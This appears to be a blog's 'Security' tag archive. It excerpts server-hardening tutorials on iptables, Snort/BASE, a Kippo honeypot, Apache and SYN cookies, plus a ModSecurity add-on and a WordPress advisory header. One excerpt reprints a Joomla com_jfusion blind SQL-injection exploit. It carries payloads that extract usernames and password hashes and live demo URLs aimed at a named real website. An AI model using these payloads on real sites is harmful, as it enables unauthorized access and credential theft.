Tag archive for ‘Security’

HowTo: Add iptable modules on a VPS

If you receive the following error on restating iptables on a VPS: error message: from firewall software ~ iptables: Unknown error 4294967295 you need to make sure the required iptable modules are loaded in the host server kernel. You have to use modprobe to load the following modules in the kernel: modprobe ipt_MASQUERADE modprobe ipt_helper [...]

Intrusion Detection With BASE And Snort – Part2

LIBPCAP Go to: http://www.tcpdump.org/ and select a download link for Libpcap (at time of writing this it is libpcap-0.9.4.tar.gz) cd back to the snorttemp map: cd /root/snorttemp and download the libpcap-0.9.4.tar.gz file: wget http://www.tcpdump.org/release/libpcap-0.9.4.tar.gz Untar the file: tar -xvzf libpcap-0.9.4.tar.gz Remove the file: rm libpcap-0.9.4.tar.gz BASE (Basic Analysis and Security Engine ) Go to: http://secureideas.sourceforge.net/ [...]

Intrusion Detection With BASE And Snort – Part1

This tutorial shows how to install and configure BASE (Basic Analysis and Security Engine) and the Snort intrusion detection system (IDS) on a Debian Sarge system. BASE provides a web front-end to query and analyze the alerts coming from a Snort IDS system. With BASE you can perform analysis of intrusions that Snort has detected [...]

How To Set Up Kippo SSH Honeypot On CentOS 5.5

Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker. Kippo is inspired, but not based on Kojoney. If you need more information about Kippo please visit its official site on http://code.google.com/p/kippo/. This tutorial shows how you can compile and install [...]

Basic Steps to Secure Apache

Here are some basic steps to secure Apache Web Server IMPORTANT NOTE: These suggestions may vary from server to server and modify the values as per your server configurations. It is up to you to determine if any of the changes suggested here are not compatible with your requirements. 1. Hide the Apache Version number, [...]

How to setup jailed ssh and jailed cgi (beta)

If you run custombuild, the jailed script portion of this guide is in the options.conf. #Jailed shell (beta) jail=yes Then type ./build all_jail The “./jail/jail_user.sh user” (from the custombuild dir) would be used for each user you want to jail. The remaining httpd.conf and other options from this guide still apply. 1) First, install the [...]

Prevent SYN attacks

1. Enable SYN cookies mechanism in the server by the executing command: # echo 1 > /proc/sys/net/ipv4/tcp_syncookies 2. Increase the backlog queue to 2048 by the command: # sysctl -w net.ipv4.tcp_max_syn_backlog=”2048″

Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ################################################### [+] Author : Chip D3 Bi0s [+] Email : chipdebios[alt+64]gmail.com [+] Vulnerability : Blind SQL injection ################################################### Example: http://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code] n:valid Itemid Sql code: +and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/* +and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/* etc, etc… DEMO LIVE: http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1 http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97 !False ¡¡¡¡ http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=98 ¡True ¡¡¡¡ etc, etc…. I let a script that Now [...]

WordPress

I. VULNERABILITY WordPress <= 2.8.3 Remote admin reset password II. BACKGROUND WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability. WordPress is both free and priceless at the same time. More simply, WordPress is what you use when you want to work with your blogging software, not fight it. [...]

ConfigServer ModSecurity Control

This is an exclusive! and free! add-on product for cPanel/WHM. The product provides you with an interface to the cPanel mod_security implementation from within WHM. With ConfigServer ModSecurity Control you can: Disable mod_security rules that have unique ID numbers on a global, per cPanel user or per hosted domain level Disable mod_security entirely, also on [...]

Enter your email address:

Liên Kết Website

web design | Shared linux windows problems | Dedicated server | website chất lượng cao | hosting chất lượng cao | Tutorial video collection | Troubleshooting Tips and Tutorial